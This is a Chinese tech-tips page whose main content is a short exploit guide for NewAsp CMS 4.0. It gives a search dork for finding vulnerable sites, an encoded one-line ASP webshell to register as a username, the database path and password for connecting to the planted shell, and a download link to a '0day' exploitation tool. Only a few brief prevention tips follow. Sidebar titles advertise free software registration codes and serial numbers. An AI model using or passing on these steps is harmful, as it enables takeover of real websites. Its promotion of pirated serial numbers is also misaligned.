- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
- 3ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 4Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 5Intel i7-9700K性能跑分曝光:同代提升約12%
- 6XP系統怎么清除緩存?
- 7AMD推土機架構回顧:雖隕落卻是Zen成功的墊腳石
- 8紅米note3與小米4哪一個好 小米4與紅米note3比較
- 9美國增加25%進口關稅!PC硬件要大漲價
- 10Adobe Illustrator CS5 序列號大全
- 11ACDSee與2345看圖王哪一個好用?區別比較
- 12iPhoneX屏幕變色,官方回應是正常情況,iPhoneX屏幕變色了怎么辦?
[摘要]概述: 由于新云4.0對注冊用戶未過濾特殊字符, 造成黑客通過腳本編碼轉換將一句話木馬寫入數據庫文件, 從而獲得WEBSHELL權限。 測試: 1. 打開...
概述:
由于新云4.0對注冊用戶未過濾特殊字符, 造成黑客通過腳本編碼轉換將一句話木馬寫入數據庫文件, 從而獲得WEBSHELL權限。
測試:
1. 打開www.google.cn 搜索關鍵字:Powered By NewAsp CMS Version 4.0 或 新云問吧
2. 將<%execute request("a")%> 編碼轉換為 ┼攠數畣整爠煥敵瑳∨≡┩愾
3. 以┼攠數畣整爠煥敵瑳∨≡┩愾 為用戶名注冊帳戶
4. 用一句話連接端連接 目標站點url/ask/data/ask_newasp.asa ,密碼為 a
5.上傳腳本大馬或者執行其它操作, 這里WEBSHELL權限已經獲得。
預防:
1.嚴格過濾注冊用戶名, 限制注冊用戶名長度及禁止特殊符號。
2.更改ask/data/ask_newasp.asa 路徑及名稱。
3.給文件夾做權限設置, 去除公共寫入權限。
附工具:
新云最新Oday利用工具 1010
下載地址:http://www.arpun.com/soft/3392.html
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1放棄阿里媽媽 流量猛增6倍、收入增3倍
- 2我是怎么使用互聯網日賺300的
- 3淘寶購物心得及防騙建議
- 4價值取向 我們靠它賺會員的錢
- 5站長朋友怎么找到適合自己的廣告聯盟
- 6日賺500元的不可行性區分
- 7你的網絡廣告帶動銷售了嗎
- 8談談我對那些“日賺百元,千元”廣告的看法
- 9什么是網賺騙子呢 高手指點,新手關注
- 10接到郵件 GG賬號被封了
- 11SEO怎么選擇關鍵詞?在什么位置加入關鍵詞合理呢?
- 12應對2017搜索引擎各種算法優化方法總結
- 1Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 2XP系統怎么清除緩存?
- 3ACDSee與2345看圖王哪一個好用?區別比較
- 4Adobe Illustrator CS5 序列號大全
- 5iPhoneX屏幕變色,官方回應是正常情況,iPhoneX屏幕變色了怎么辦?
- 6華為mate8跑分多少 華為mate8性能安兔兔跑分評測
- 7picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 8XP系統安裝chrome無法找到入口怎么處理?
- 9最新的Adobe Illustrator CS4序列號大全
- 10魅族flyme5.0怎么分屏 魅族flyme5分屏模式使用圖文說明教程
- 11小米平板2支持QC2.0快充嗎
- 12iPhone手機保修信息怎么用微信查?
